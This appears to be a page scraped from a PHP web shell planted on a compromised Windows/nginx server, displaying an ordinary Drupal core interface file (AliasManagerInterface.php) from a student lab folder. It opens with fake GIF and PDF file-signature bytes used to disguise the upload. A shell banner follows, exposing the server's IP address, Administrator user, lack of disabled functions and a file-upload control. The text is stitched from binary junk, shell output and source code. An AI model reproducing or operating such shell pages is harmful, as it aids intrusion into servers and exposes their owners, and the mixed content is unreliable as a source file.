GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/lib/Drupal/Core/Path/ |
Upload File : |
<?php namespace Drupal\Core\Path; /** * Find an alias for a path and vice versa. * * @see \Drupal\Core\Path\AliasStorageInterface */ interface AliasManagerInterface { /** * Given the alias, return the path it represents. * * @param string $alias * An alias. * @param string $langcode * An optional language code to look up the path in. * * @return string * The path represented by alias, or the alias if no path was found. * * @throws \InvalidArgumentException * Thrown when the path does not start with a slash. */ public function getPathByAlias($alias, $langcode = NULL); /** * Given a path, return the alias. * * @param string $path * A path. * @param string $langcode * An optional language code to look up the path in. * * @return string * An alias that represents the path, or path if no alias was found. * * @throws \InvalidArgumentException * Thrown when the path does not start with a slash. */ public function getAliasByPath($path, $langcode = NULL); /** * Clear internal caches in alias manager. * * @param $source * Source path of the alias that is being inserted/updated. Can be omitted * if entire cache needs to be flushed. */ public function cacheClear($source = NULL); }